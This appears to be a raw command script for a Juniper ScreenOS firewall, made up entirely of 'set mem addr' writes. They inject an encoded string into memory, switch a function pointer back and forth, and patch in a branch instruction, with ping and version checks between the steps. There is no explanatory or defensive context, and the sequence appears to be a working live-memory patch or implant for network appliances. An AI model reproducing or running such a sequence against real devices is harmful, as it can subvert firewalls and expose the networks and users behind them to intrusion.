set mem addr 0x19603b4 0x000636f0
ping
set mem addr 0x1a81b08 0x4d333241
set mem addr 0x1a81b0c 0x3643302c
set mem addr 0x1a81b10 0x3031653a
set mem addr 0x1a81b14 0x33443230
set mem addr 0x1a81b18 0x30303334
set mem addr 0x1a81b1c 0x33383630
set mem addr 0x1a81b20 0x34383030
set mem addr 0x1a81b24 0x62303639
set mem addr 0x1a81b28 0x33333363
set mem addr 0x1a81b2c 0x33643230
set mem addr 0x1a81b30 0x30303661
set mem addr 0x1a81b34 0x36313239
set mem addr 0x1a81b38 0x38363138
set mem addr 0x1a81b3c 0x37643238
set mem addr 0x1a81b40 0x30336136
set mem addr 0x1a81b44 0x34653830
set mem addr 0x1a81b48 0x30303230
set mem addr 0x1a81b4c 0x00000000
set mem addr 0x19603b4 0x0032a50c
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x19603b4 0x000636f0
get tech | in juniper
ping
set mem addr 0x3429f0 0x48000014
set mem addr 0x19603b4 0x0065108c
